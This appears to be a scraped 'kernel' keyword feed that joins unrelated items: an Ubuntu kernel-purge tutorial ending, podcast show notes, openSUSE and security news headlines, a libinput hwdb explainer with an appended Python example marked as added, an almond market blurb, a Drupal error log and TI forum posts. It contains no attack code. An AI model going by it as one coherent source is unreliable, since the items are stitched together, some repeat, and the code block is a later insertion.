Found memtest86+ image: /boot/memtest86+.bin
done
(Reading database ... 290810 files and directories currently installed.)
Purging configuration files for linux-image-extra-4.13.0-37-generic (4.13.0-37.42) ...
Purging configuration files for linux-image-4.13.0-37-generic (4.13.0-37.42) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic

Thanks for using this script!!!

Recheck the list of installed kernels with the following command. It will keep only three old kernels.

$ dpkg --list | grep linux-image
ii linux-image-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-generic 4.13.0.39.42 amd64 Generic Linux kernel image
ii linux-image-unsigned-4.16.7-041607-generic 4.16.7-041607.201805021131 amd64 Linux kernel image for version 4.16.7 on 64 bit x86 SMP

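Next time, you can invoke the do-kernel-upgrade utility to install a new kernel. If a new kernel is available, it will install it. If not, it will report that no kernel update is currently available.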

$ do-kernel-upgrade
Kernel up to date. Finishing

Run the do-kernel-purge command again to confirm. If it finds more than three kernels, it removes them. If not, it reports that there is nothing to remove.

$ do-kernel-purge

Ubuntu Kernel Purge - by Caio Oliveira

This script will only keep three versions: the first and the last two, others will be purge

---Current version:
Linux Kernel 4.16.7-041607 Generic (linux-image-4.16.7-041607-generic)
Nothing to remove!

Thanks for using this script!!!

via: https://www.2daygeek.com/uktools-easy-way-to-install-latest-stable-linux-kernel-on-ubuntu-mint-and-derivatives/

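Author: Prakash Subramanian; Topic selection: lujun9972; Translator: MjSeven; Proofreader: wxy

This article was originally compiled by LCTT and is proudly presented by Linux中国 (Linux China).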


Episode 79: What You Need to Know about WireGuard
When Linus says that he skimmed the code and it's so exciting that he's hoping it gets merged quickly, you know this is the next big thing in Linux. We talk to Jim Salter. He gives us a perspective from day 0. We discuss the new Google gaming box, and give you a tease about some upcoming information about Southeast Linuxfest.
-- The Cliff Notes --
For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard!
This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/79)
Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah)
-- Stay In Touch --
Find all the resources for this show on the Ask Noah Dashboard
Ask Noah Dashboard (http://www.asknoahshow.com)
Need more help than a radio show can offer? Altispeed provides commercial IT services and they're excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show!
Altispeed Technologies (http://www.altispeed.com/)
Contact Noah asknoah [at] jupiterbroadcasting.com
-- Twitter --
Noah - Kernellinux (https://twitter.com/kernellinux)
Ask Noah Show (https://twitter.com/asknoahshow)
Altispeed Technologies (https://twitter.com/altispeed)
Jupiter Broadcasting (https://twitter.com/jbsignal)
Episode 78: Homeless to Web Developer Overnight
How do you go from being homeless on the streets of CA to getting offers from Google, Amazon, and others? We discuss! The GPD team has released the 2nd gen 7" laptop and we give you our thoughts on their awesome laptop without Linux. As always your questions go to the front of the line.
-- The Cliff Notes --
For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard!
This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/78)
Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah)
Episode 44: RedHat with Brandon Johnson
We pick up where we left off last Friday with our discussion about Spectre & Meltdown. Brandon Johnson from RedHat joins us to talk about this important topic & what he and his team at RedHat are doing to mitigate this disaster.
-- The Cliff Notes --
Problem Booting Windows with AMD (https://support.microsoft.com/en-us/help/4073707/windows-operating-system-security-update-block-for-some-amd-based-devi?ranMID=24542&ranEAID=nOD%2FrLJHOac&ranSiteID=nOD_rLJHOac-AVnR8kDXzs7ZsWhqsDfF6A&tduid=(f0187439558fdb09f4f2aa182b303234)(256380)(2459594)(nOD_rLJHOac-AVnR8kDXzs7ZsWhqsDfF6A)())
Meltdown and Spectre for Non Technical Users (https://blog.cloudflare.com/meltdown-spectre-non-technical/)
Meltdown and Spectre the Battle Continues (http://www.zdnet.com/article/the-linux-vs-meltdown-and-spectre-battle-continues/)
Meltdown Attack Simply Explained (https://meltdownattack.com/)
What RedHat says You Need to Know (https://www.redhat.com/en/blog/what-are-meltdown-and-spectre-here%E2%80%99s-what-you-need-know)
Microsoft Halts Patches (https://www.pcworld.com/article/3246189/security/microsoft-halts-meltdown-patches-windows-amd-pcs-unbootable.html)
Microsoft Halts Patches Cont. (https://www.engadget.com/2018/01/09/microsoft-halts-meltdown-spectre-amd-patches/)
Meltdown Spectre Bug Collision (https://www.wired.com/story/meltdown-spectre-bug-collision-intel-chip-flaw-discovery/)
Kids Router (http://amzn.to/2CZKsIb)
RedHat Opens up Resources For You (https://twitter.com/RedHatNews/status/948936504453292032)
RedHat Resources (https://access.redhat.com/solutions/3307851)
Linus Torvalds Advice to Intel (https://lkml.org/lkml/2018/1/3/797)
Intel CEO Sale of Stock Before Security Bug Reveal (https://arstechnica.com/information-technology/2018/01/intel-ceos-sale-of-stock-just-before-security-bug-reveal-raises-questions/)
Intel Bug Performance Hit (https://www.forbes.com/sites/davealtavilla/2018/01/03/intel-processor-bug-leaves-all-current-chips-vulnerable-and-its-fix-saps-performance/#72b7fb7a570a)
Intel Bug Fix Kernel Fix (https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5aa90a84589282b87666f92b6c3c917c8080a9bf)
Canonical Updates for Meltdown and Spectre (https://insights.ubuntu.com/2018/01/04/ubuntu-updates-for-the-meltdown-spectre-vulnerabilities/)
Intel SPI Bug Fix (https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1734147)
BIOS Fix Download (http://people.canonical.com/~ypwong/lp1734147/linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330+20170103+1_amd64.deb)
Backup BIOS Fix Update (http://people.canonical.com/~ypwong/lp1734147/linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330+clear+debug_amd64.deb)
See How the Ask Noah Show Got Started (video) (https://www.youtube.com/watch?v=6CkKku1JAe8)
VoxTeleSys (http://www.voxtelesys.com)
          Episode 29: Ubuntu Rally Explained
Noah takes a deep dive into Mir Wayland, what Canonical is doing with Ubuntu & how other projects like Arch and Fedora play into it. Interviews with people from the rally & of course your calls.

-- The Cliff Notes --

  • Purism Phone (https://puri.sm/shop/librem-5/)
  • Zoom H5N Recorder (http://amzn.to/2xtNeDF)
  • How To Install Snaps (http://www.techrepublic.com/article/how-to-install-snap-packages-on-ubuntu-16-04/)
  • Zurmo CRM (http://zurmo.org/)
  • Invoice Ninja (https://www.invoiceninja.com/)
  • Interested in Hosted Zurmo? (http://www.altispeed.com/contact.html)
  • Vox Tel Sys (http://www.voxtelsys.com)
          openSUSE Leap 42.3 Operating System Support Extended Until June 30, 2019

Launched on July 26, 2017, the openSUSE Leap 42.3 operating system is based on SUSE Linux Enterprise (SLE) 12 Service Pack (SP) 3 and the long-term supported Linux 4.4 kernel series. Like previous openSUSE Leap 42 point releases, openSUSE Leap 42.3 was supposed to receive 18 months of support, until January 2019.

However, both the openSUSE Project and parent company SUSE decided to give users more time to upgrade to the latest openSUSE Leap 15 release, which is based on the SUSE Linux Enterprise (SLE) 15 operating system series, by continuing to deliver updates to the openSUSE Leap 42.3 release, and the openSUSE Leap 42 series, for six more months.



          OpenSUSE/SUSE: openSUSE Leap 42.3 and Kubic's Change of Heart
  • openSUSE Leap 42.3 Operating System Support Extended Until June 30, 2019

    The openSUSE Project announced this week that they'd extended support for the openSUSE Leap 42.3 operating system with six more months to allow more users to upgrade to the latest openSUSE Leap 15 release.

    Launched on July 26, 2017, the openSUSE Leap 42.3 operating system is based on SUSE Linux Enterprise (SLE) 12 Service Pack (SP) 3 and the long-term supported Linux 4.4 kernel series. Like previous openSUSE Leap 42 point releases, openSUSE Leap 42.3 was supposed to receive 18 months of support, until January 2019.

  • An Exciting New Direction

    It’s been over a year since we started the Kubic project, and it’s worth looking back over the last months and evaluating where we’ve succeeded, where we haven’t, and sharing with you all our plans for the future.

  • OpenSUSE Kubic Shifts Focus Following Self-Reflection

    OpenSUSE's Kubic project that has been home to their container-related technologies as well as the atomically-updated openSUSE "MicroOS" will be making some changes.


          Almond Kernels Market Trends, And Forecasts (2018–2023)
(EMAILWIRE.COM, August 09, 2018 ) The fruit of an almond is a drupe which consists of an outer hull and a hard shell covering the seed or kernel. The process of removal of the shell of an almond is termed … Continue reading
          Software Engineer - VMware - Palo Alto, CA
1 year of experience in Intel and AMD x86 based processor architecture. 1 year of experience in OS kernel internals, including memory management, resource...
From VMware - Wed, 25 Jul 2018 00:20:47 GMT
          Security Leftovers
  • People Think Their Passwords Are Too Awesome For Two Factor Authentication. They’re Wrong.
  • Security updates for Thursday
  • Let's Encrypt Now Trusted by All Major Root Programs

    Now, the CA’s root is directly trusted by almost all newer versions of operating systems, browsers, and devices. Many older versions, however, still do not directly trust Let’s Encrypt.

    While some of these are expected to be updated to trust the CA, others won’t, and it might take at least five more years until most of them cycle out of the Web ecosystem. Until that happens, Let’s Encrypt will continue to use a cross signature.

  • WPA2 flaw lets attackers easily crack WiFi passwords

    The security flaw was found, accidentally, by security researcher Jens Steube while conducting tests on the forthcoming WPA3 security protocol; in particular, on differences between WPA2's Pre-Shared Key exchange process and WPA3's Simultaneous Authentication of Equals, which will replace it. WPA3 will be much harder to attack because of this innovation, he added.

  • Linux kernel network TCP bug fixed

    Another day, another bit of security hysteria. This time around the usually reliable Carnegie Mellon University's CERT/CC claimed the Linux kernel's TCP network stack could be "forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service (DoS)."

  • State of Security for Open Source Web Applications 2018

    Each year, we publish a set of statistics summarizing the vulnerabilities we find in open source web applications. Our tests form part of Netsparker's quality assurance practices, during which we scan thousands of web applications and websites. This helps us to add to our security checks and continuously improve the scanner's accuracy.

    This blog post includes statistics based on security research conducted throughout 2017. But first, we take a look at why we care about open source applications, and the damage that can be caused for enterprises when they go wrong.

  • New Actor DarkHydrus Targets Middle East with Open-Source Phishing [Ed: Headline says "Open-Source Phishing," but this is actually about Microsoft Windows and Office (proprietary and full of serious bugs)]

    Government entities and educational institutions in the Middle East are under attack in an ongoing credential-harvesting campaign, mounted by a newly-named threat group known as DarkHydrus. In a twist on the norm, the group is leveraging the open-source Phishery tool to carry out its dark work.

    The attacks follow a well-worn pattern, according to Palo Alto Networks’ Unit 42 group: Spear-phishing emails with attached malicious Microsoft Office documents are leveraging the “attachedTemplate” technique to load a template from a remote server.



          today's howtos

          Stable kernels 4.17.14, 4.14.62, 4.9.119, 4.4.147 and 3.18.118

          Linux Foundation and Kernel News

          Graphics: Libinput, Mesa and AMD
  • How the 60-evdev.hwdb works

    libinput made a design decision early on to use physical reference points wherever possible. So your virtual buttons are X mm high/across, the pointer movement is calculated in mm, etc. Unfortunately this exposed us to a large range of devices that don't bother to provide that information or just give us the wrong information to begin with. Patching the kernel for every device is not feasible so in 2015 the 60-evdev.hwdb was born and it has seen steady updates since. Plenty a libinput bug was fixed by just correcting the device's axis ranges or resolution. To take the magic out of the 60-evdev.hwdb, here's a blog post for your perusal, appreciation or, failing that, shaking a fist at. Note that the below is caller-agnostic, it doesn't matter what userspace stack you use to process your input events.

  • Mesa 18.2-RC2 Released With 17 Fixes So Far

    One week after branching Mesa 18.2 and issuing the first release candidate, the second weekly RC is now available for testing.

    Mesa 18.2-RC2 has 17 patches queued, including several V3D (formerly "VC5") Broadcom driver fixes, build system updates, fixing the DRISW compilation for Android Nougat, and other small fixes.

  • Mesa 18.2.0-rc2

    The second release candidate for the Mesa 18.2.0 is now available.

  • AMDGPU LRU Bulk Move Functionality Increases Performance In OpenCL And Vulkan
  • AMD Releases 18.Q3 Linux Drivers for Radeon Pro, Including Ubuntu 18.04 LTS Support

    This update also brings Vulkan 1.1 support, and initial support for Ubuntu 18.04 LTS – which is great news for those who recently upgraded to the latest Ubuntu 18.04 LTS package.

    The package is mainly intended for Vega Frontier, Radeon Pro, Radeon Pro WX, and FirePro S/W graphics cards, and the entire driver stack is derived from the 18.20 driver branch which includes both PRO and All-Open driver options.



          ✌ Linux vulnerability could lead to DDoS attacks

A Linux kernel vulnerability affecting version 4.9 and up could allow an attacker to carry out denial-of-service attacks on a system with an available open port.


          Latest ClearFog SBC offers four GbE ports and a 10GbE SFP+ port

SolidRun’s “ClearFog GT 8K” networking SBC runs Ubuntu on a network virtualization enabled quad-A72 Armada A8040 SoC and offers up to 16GB DDR4, 4x GbE ports, a WAN port, a 10GbE SFP+ port, and 3x mini-PCIe slots.

SolidRun has updated its ClearFog line of Linux-driven router SBCs with a ClearFog GT 8K model designed for high-end edge computing, virtual customer premise equipment (vCPE), network functional virtualization (NFV), network security, and general networking duty. The SBC runs Linux Kernel 4.4x, Ubuntu 16.04, and Google IoT Core on Marvell’s quad-core, up to 2GHz Cortex-A72 Armada A8040 SoC. Models are available with 8GB eMMC ($209), 128GB eMMC ($304), 8GB eMMC with 16GB RAM ($526), and 128GB eMMC with 16GB RAM ($621).



          Black Hat 2018: Stealthy Kernel Attack Flies Under Windows Mitigation Radar
Researchers create PoC of a post-exploitation kernel-mode fileless attack technique.
          [GIT] rosenbridge - hardware backdoors in x86 CPUs
---Quote--- While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems,...
          Peter Hutterer: How the 60-evdev.hwdb works

libinput made a design decision early on to use physical reference points wherever possible. So your virtual buttons are X mm high/across, the pointer movement is calculated in mm, etc. Unfortunately this exposed us to a large range of devices that don't bother to provide that information or just give us the wrong information to begin with. Patching the kernel for every device is not feasible so in 2015 the 60-evdev.hwdb was born and it has seen steady updates since. Plenty a libinput bug was fixed by just correcting the device's axis ranges or resolution. To take the magic out of the 60-evdev.hwdb, here's a blog post for your perusal, appreciation or, failing that, shaking a fist at. Note that the below is caller-agnostic, it doesn't matter what userspace stack you use to process your input events.

There are four parts that come together to fix devices: a kernel ioctl and a trifecta of udev rules, hwdb entries and a udev builtin.

The kernel's EVIOCSABS ioctl

It all starts with the kernel's struct input_absinfo.

    struct input_absinfo {
            __s32 value;
            __s32 minimum;
            __s32 maximum;
            __s32 fuzz;
            __s32 flat;
            __s32 resolution;
    };

The three values that matter right now: minimum, maximum and resolution. The "value" is just the most recent value on this axis, ignore fuzz/flat for now. The min/max values simply specify the range of values the device will give you, the resolution how many values per mm you get. Simple example: an x axis given at min 0, max 1000 at a resolution of 10 means your device is 100mm wide. There is no requirement for min to be 0, btw, and there's no clipping in the kernel so you may get values outside min/max. Anyway, your average touchpad looks like this in evemu-record:

    #   Event type 3 (EV_ABS)
    #     Event code 0 (ABS_X)
    #       Value      2572
    #       Min        1024
    #       Max        5112
    #       Fuzz          0
    #       Flat          0
    #       Resolution   41
    #     Event code 1 (ABS_Y)
    #       Value      4697
    #       Min        2024
    #       Max        4832
    #       Fuzz          0
    #       Flat          0
    #       Resolution   37

This is the information returned by the EVIOCGABS ioctl (EVdev IOCtl Get ABS). It is usually run once on device init by any process handling evdev device nodes.

Because plenty of devices don't announce the correct ranges or resolution, the kernel provides the EVIOCSABS ioctl (EVdev IOCtl Set ABS). This allows overwriting the in-kernel struct with new values for min/max/fuzz/flat/resolution; processes that query the device later will get the updated ranges.

udev rules, hwdb and builtins

The kernel has no notification mechanism for updated axis ranges so the ioctl must be applied before any process opens the device. This effectively means it must be applied by a udev rule. udev rules are a bit limited in what they can do, so if we need to call an ioctl, we need to run a program. And while udev rules can do matching, the hwdb is easier to edit and maintain. So the pieces we have are: a hwdb that knows when to change (and the values), a udev program to apply the values and a udev rule to tie those two together.

In our case the rule is 60-evdev.rules. It checks the 60-evdev.hwdb for matching entries [1], then invokes the udev-builtin-keyboard if any matching entries are found. That builtin parses the udev properties assigned by the hwdb and converts them into EVIOCSABS ioctl calls. These three pieces need to agree on each other's formats - the udev rule and hwdb agree on the matches and the hwdb and the builtin agree on the property names and value format.

By itself, the hwdb has no specific format beyond this:

    some-match-that-identifies-a-device
     PROPERTY_NAME=value
     OTHER_NAME=othervalue

But since we want to match for specific use-cases, our udev rule assembles several specific match lines. Have a look at 60-evdev.rules again, the last rule in there assembles a string in the form of "evdev:name:the device name:content of /sys/class/dmi/id/modalias". So your hwdb entry could look like this:

    evdev:name:My Touchpad Name:dmi:*svnDellInc*
     EVDEV_ABS_00=0:1:3

If the name matches and you're on a Dell system, the device gets the EVDEV_ABS_00 property assigned. The "evdev:" prefix in the match line is merely to distinguish from other match rules to avoid false positives. It can be anything, libinput unsurprisingly used "libinput:" for its properties.

The last part now is understanding what EVDEV_ABS_00 means. It's a fixed string with the axis number as hex number - 0x00 is ABS_X. And the values afterwards are simply min, max, resolution, fuzz, flat, in that order. So the above example would set min/max to 0:1 and resolution to 3 (not very useful, I admit).

Trailing bits can be skipped altogether and bits that don't need overriding can be skipped as well provided the colons are in place. So the common use-case of overriding a touchpad's x/y resolution looks like this:

    evdev:name:My Touchpad Name:dmi:*svnDellInc*
     EVDEV_ABS_00=::30
     EVDEV_ABS_01=::20
     EVDEV_ABS_35=::30
     EVDEV_ABS_36=::20

0x00 and 0x01 are ABS_X and ABS_Y, so we're setting those to 30 units/mm and 20 units/mm, respectively. And if the device is multitouch capable we also need to set ABS_MT_POSITION_X and ABS_MT_POSITION_Y to the same resolution values. The min/max ranges for all axes are left as-is.

The most confusing part is usually: the hwdb uses a binary database that needs updating whenever the hwdb entries change. A call to systemd-hwdb update does that job.

So with all the pieces in place, let's see what happens when the kernel tells udev about the device:

  • The udev rule assembles a match and calls out to the hwdb
  • The hwdb applies udev properties where applicable and returns success
  • The udev rule calls the udev keyboard-builtin
  • The keyboard builtin parses the EVDEV_ABS_xx properties and issues an EVIOCSABS ioctl for each axis
  • The kernel updates the in-kernel description of the device accordingly
  • The udev rule finishes and udev sends out the "device added" notification
  • The userspace process sees the "device added" and opens the device which now has corrected values
  • Celebratory champagne corks are popping everywhere, hands are shaken, shoulders are patted in congratulations of another device saved from the tyranny of wrong axis ranges/resolutions

Once you understand how the various bits fit together it should be quite easy to understand what happens. Then the remainder is just adding hwdb entries where necessary but the touchpad-edge-detector tool is useful for figuring those out.

[1] Not technically correct, the udev rule merely calls the hwdb builtin which searches through all hwdb entries. It doesn't matter which file the entries are in.
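
The property format described above, as an added example that is not part of the original post and is not udev's own code: it parses hwdb-style text, matches it against the assembled "evdev:name:...:modalias" string, and applies the EVDEV_ABS_xx overrides to the axis data from the evemu-record output. Assumptions: Python's fnmatch stands in for the hwdb's glob matching, each match line starts its own record, and the DMI modalias strings are constructed.

```python
import fnmatch

# Field order inside an EVDEV_ABS_xx value, as given in the post.
FIELDS = ("minimum", "maximum", "resolution", "fuzz", "flat")
PREFIX = "EVDEV_ABS_"

# hwdb entry from the post's resolution example.
SAMPLE_HWDB = """\
# comment lines and blank lines are ignored
evdev:name:My Touchpad Name:dmi:*svnDellInc*
 EVDEV_ABS_00=::30
 EVDEV_ABS_01=::20
 EVDEV_ABS_35=::30
 EVDEV_ABS_36=::20
"""

# Axis data from the evemu-record output in the post (ABS_X, ABS_Y).
SAMPLE_ABSINFO = {
    0x00: {"minimum": 1024, "maximum": 5112, "fuzz": 0, "flat": 0, "resolution": 41},
    0x01: {"minimum": 2024, "maximum": 4832, "fuzz": 0, "flat": 0, "resolution": 37},
}

# Constructed modalias strings (placeholders, not from a real machine).
DELL_MODALIAS = "dmi:bvnDellInc.:bvr1.0.0:svnDellInc.:pnConstructedModel:"
OTHER_MODALIAS = "dmi:bvnExample:bvr1.0.0:svnExampleCorp:pnConstructedModel:"


def parse_hwdb(text):
    """Return [(match_glob, {property: value})] from hwdb-style text."""
    entries, current = [], None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if not line[0].isspace():            # match lines start in column 0
            current = (line.strip(), {})
            entries.append(current)
        elif current is not None and "=" in line:
            key, _, value = line.strip().partition("=")
            current[1][key] = value
    return entries


def parse_abs_override(value):
    """Turn 'min:max:res:fuzz:flat' into a dict of the fields that are set.

    Empty fields and omitted trailing fields are left out, which is what
    lets '::30' override the resolution only.
    """
    parts = value.split(":")
    if len(parts) > len(FIELDS):
        raise ValueError(f"too many fields in {value!r}")
    return {name: int(part) for name, part in zip(FIELDS, parts) if part != ""}


def overrides_for(entries, name, modalias):
    """Collect {axis_code: {field: value}} for one device."""
    key = f"evdev:name:{name}:{modalias}"
    result = {}
    for glob, props in entries:
        if not fnmatch.fnmatchcase(key, glob):
            continue
        for prop, value in props.items():
            if prop.startswith(PREFIX):
                axis = int(prop[len(PREFIX):], 16)   # axis code is hex
                result.setdefault(axis, {}).update(parse_abs_override(value))
    return result


def apply_overrides(absinfo, overrides):
    """Return a copy of absinfo with overrides applied to axes the device has."""
    fixed = {axis: dict(info) for axis, info in absinfo.items()}
    for axis, fields in overrides.items():
        if axis in fixed:                    # no MT axes on this sample device
            fixed[axis].update(fields)
    return fixed


def size_mm(info):
    """Physical extent of one axis: value range divided by units per mm."""
    return (info["maximum"] - info["minimum"]) / info["resolution"]


if __name__ == "__main__":
    entries = parse_hwdb(SAMPLE_HWDB)
    ov = overrides_for(entries, "My Touchpad Name", DELL_MODALIAS)
    fixed = apply_overrides(SAMPLE_ABSINFO, ov)
    for axis in sorted(fixed):
        print(f"axis 0x{axis:02x}: {size_mm(SAMPLE_ABSINFO[axis]):.1f} mm"
              f" -> {size_mm(fixed[axis]):.1f} mm")
```
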
          Almond Kernels Market Trends, And Forecasts (2018–2023)
(EMAILWIRE.COM, August 09, 2018 ) The fruit of an almond is a drupe which consists of an outer hull and a hard shell covering the seed or kernel. The process of removal of the shell of an almond is termed shelling, and the almonds are sold shelled or unshelled. There are two types of almonds. Sweet...
          Linux kernel network TCP bug fixed
The denial of service bug had actually been patched in the Linux kernel weeks before news of it was ever announced.
          LINUX VULNERABILITY WOULD ALLOW DENIAL-OF-SERVICE ATTACKS
Patches for the vulnerability are now available. Network security specialists report that a vulnerability in the Linux operating system kernel affecting version 4.9 and later could allow a hacker to carry out denial-of-service (DoS) attacks on a system with an available open port. A security report warns about...

          Attempting to View Revisions Gives Error Message
Message

When I attempt to view revisions, I get the following error message:

The website encountered an unexpected error. Please try again later.

I recently upgraded from 8.5.5 to 8.5.6

I also have enabled the Content Moderation and Workflows modules in Core. I have added States and Transitions to the default Editorial workflow.

Here is the error message from the log file:

Error: Call to a member function toArray() on string in nycourts_preprocess_node() (line 37 of /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/themes/nycourts/nycourts.theme) #0 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Theme/ThemeManager.php(287): nycourts_preprocess_node(Array, 'node', Array) #1 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\Core\Theme\ThemeManager->render('node', Array) #2 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\Core\Render\Renderer->doRender(Array, false) #3 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(226): Drupal\Core\Render\Renderer->render(Array, false) #4 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\Core\Render\MainContent\HtmlRenderer->Drupal\Core\Render\MainContent\{closure}() #5 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(227): Drupal\Core\Render\Renderer->executeInRenderContext(Object(Drupal\Core\Render\RenderContext), Object(Closure)) #6 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(117): Drupal\Core\Render\MainContent\HtmlRenderer->prepare(Array, Object(Symfony\Component\HttpFoundation\Request), Object(Drupal\Core\Routing\CurrentRouteMatch)) #7 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\Core\Render\MainContent\HtmlRenderer->renderResponse(Array, Object(Symfony\Component\HttpFoundation\Request), Object(Drupal\Core\Routing\CurrentRouteMatch)) #8 [internal function]: Drupal\Core\EventSubscriber\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\Component\HttpKernel\Event\GetResponseForControllerResultEvent), 'kernel.view', 
Object(Drupal\Component\EventDispatcher\ContainerAwareEventDispatcher)) #9 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\Component\HttpKernel\Event\GetResponseForControllerResultEvent), 'kernel.view', Object(Drupal\Component\EventDispatcher\ContainerAwareEventDispatcher)) #10 /Users/tklem/Sites/devdesktop/nyscourts-dev/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\Component\EventDispatcher\ContainerAwareEventDispatcher->dispatch('kernel.view', Object(Symfony\Component\HttpKernel\Event\GetResponseForControllerResultEvent)) #11 /Users/tklem/Sites/devdesktop/nyscourts-dev/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\Component\HttpKernel\HttpKernel->handleRaw(Object(Symfony\Component\HttpFoundation\Request), 1) #12 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\Component\HttpKernel\HttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #13 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\Core\StackMiddleware\Session->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #14 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/modules/page_cache/src/StackMiddleware/PageCache.php(99): Drupal\Core\StackMiddleware\KernelPreHandle->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #15 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/modules/page_cache/src/StackMiddleware/PageCache.php(78): Drupal\page_cache\StackMiddleware\PageCache->pass(Object(Symfony\Component\HttpFoundation\Request), 1, true) #16 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\page_cache\StackMiddleware\PageCache->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #17 
/Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\Core\StackMiddleware\ReverseProxyMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #18 /Users/tklem/Sites/devdesktop/nyscourts-dev/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\Core\StackMiddleware\NegotiationMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #19 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/DrupalKernel.php(666): Stack\StackedHttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #20 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/index.php(19): Drupal\Core\DrupalKernel->handle(Object(Symfony\Component\HttpFoundation\Request)) #21 {main}.

Drupal version: 

          Forum Post: RE: CCS/CC2652R: Creating a RTSC Project from scratch
[quote user="Alireza Sadeghi"]I wanted to make a RTSC project so started with a new CCS project and chose an "empty RTSC project" then added a RTSC configuration file and tried to build the project But faced some Errors[/quote] Rather than creating a new project from scratch I would suggest starting with the "empty" example under TI Drivers. This will be an easier starting point to work with. You can import this project from Resource Explorer. Note that this project depends on a kernel project (tirtos_builds_...) and the kernel project is the one that contains the RTSC config file.
          Forum Post: CCS/CC2652R: Creating a RTSC Project from scratch
Part Number: CC2652R
Tool/software: Code Composer Studio

Hi guys,

I'm new to CCS. I use the CC2652R and run some SDK examples on it. Now I've been trying to make a project from scratch, aside from using the SDK examples. I wanted to make a RTSC project, so I started with a new CCS project and chose an "empty RTSC project", then added a RTSC configuration file and tried to build the project, but faced some errors like the ones below:

Description Resource Path Location Type
can't find the library 'lib/boot.aem4' specified by package ti.targets.arm.rtsarm. It wasn't found along the path 'C:/ti/simplelink_cc26x2_sdk_2_20_00_36/source;C:/ti/simplelink_cc26x2_sdk_2_20_00_36/kernel/tirtos/packages;C:/ti/xdctools_3_50_07_20_core/packages;..;'. .xdchelp /LedToggle line 48 C/C++ Problem
gmake: *** [build-748610879] Error 2 LedToggle C/C++ Problem
gmake: Target 'all' not remade because of errors. LedToggle C/C++ Problem
gmake[1]: *** [build-748610879-inproc] Error 1 LedToggle C/C++ Problem
xdctools_3_50_07_20_core\gmake.exe: *** [package/cfg/hello_pem4.xdl] Deleting file `package/cfg/hello_pem4.c' LedToggle C/C++ Problem
xdctools_3_50_07_20_core\gmake.exe: *** [package/cfg/hello_pem4.xdl] Deleting file `package/cfg/hello_pem4.h' LedToggle C/C++ Problem
xdctools_3_50_07_20_core\gmake.exe: *** Deleting file `package/cfg/hello_pem4.xdl' LedToggle C/C++ Problem

